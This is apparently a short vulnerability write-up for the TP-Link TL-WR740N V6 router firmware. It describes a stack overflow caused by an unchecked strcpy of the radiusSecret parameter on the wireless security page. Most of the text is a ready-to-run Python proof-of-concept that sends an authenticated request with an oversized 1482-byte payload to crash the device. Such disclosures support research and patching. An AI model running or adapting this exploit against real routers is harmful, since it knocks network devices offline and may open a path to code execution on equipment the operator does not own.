TL-WR740N V6
In the TL-WR740N V6 Firmware has a stack overflow vulnerability in the /userRpm/WlanSecurityRpm.htm url. The v33 variable receives the radiusSecret parameter from a POST request and is later assigned to the v49 variable, which is fixed at 84 bytes.
However, since the user can control the input of radiusSecret, the statement strcpy(&v49[8], v31); can cause a buffer overflow. The user-provided radiusSecret can exceed the capacity of the v49 array, triggering this security vulnerability.
import sys
import requests
session = requests.Session()
session.verify = False
def exp(path):
URI = "WlanSecurityRpm.htm"
headers = {
"Host": "192.168.153.2",
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:141.0) Gecko/20100101 Firefox/141.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "close",
"Referer": f"<http://192.168.153.2/{path}/userRpm/{URI}>",
"Cookie": "Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D",
"Upgrade-Insecure-Requests": "1",
"Priority": "u=4"
}
payload = "A" * 1482
params = {
"pskSecOpt": "2",
"pskCipher": "3",
"pskSecret": "12345670",
"interval": "0",
"secType": "0",
"wpaSecOpt": "3",
"wpaCipher": "3",
"radiusIp": "192.168.0.2",
"radiusPort": "1812",
"radiusSecret": payload,
"intervalWpa": "0",
"wepSecOpt": "3",
"keytype": "1",
"keynum": "1",
"key1": "",
"length1": "5",
"key2": "",
"length2": "0",
"key3": "",
"length3": "0",
"key4": "",
"length4": "0",
"Save": "Save"
}
url = f"<http://192.168.153.2:80/{path}/userRpm/{URI}>".format(
path=str(path)
)
resp = session.get(url, params=params, headers=headers)
print(resp.text)
if __name__ == "__main__":
if len(sys.argv) != 2:
print(f"python {sys.argv[0]} <path_string>")
sys.exit(1)
path_arg = sys.argv[1]
exp(path_arg)
